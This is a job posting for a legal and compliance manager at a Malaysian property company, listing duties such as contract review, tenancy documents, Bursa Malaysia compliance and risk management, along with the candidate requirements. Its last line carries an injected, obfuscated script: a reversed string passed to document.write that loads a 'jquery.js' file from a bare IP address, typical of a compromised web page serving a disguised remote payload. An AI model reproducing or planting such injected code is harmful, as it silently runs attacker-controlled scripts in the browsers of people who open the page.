Industry : Property
– Advise on legal maters pertaining to the Group of Companies ie. Drafting and reviewing of corporate documentations and contract agreements.
– Advise the Head of Real Estate on tenancy matters including reviewing and drafting of the tenancies documents.
– Assist in the Business Development ie. Review of letters of offer, negotiation of review of SPA terms.
– Review of Letters of Awards and Contract of Works for Facilities Team.
– Monitor and advise on litigation matters for the company.
– Responsible for all compliance matters ie. Securities Commission, Bursa Malaysia’s listing rules, CMSA and our Trust Deed. Involve in all corporate exercises.
– Review financing documents for the company
– Responsible for Company Secretarial matters
– Responsible as the Risk Manager Officer of the Company in the charge of risk management of the company and work closely with the Chief Executive Officer on internal corporate governance policies of the company.
– Candidate must possess at least a Bachelor’s Degree or Professional Degree in Law or equivalent.
– At least 8 years of working experience in the related field is requires for this position
– Proficient in both written and spoken English
– Good communication and interpersonal skills
– Strong leadership & analytical skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))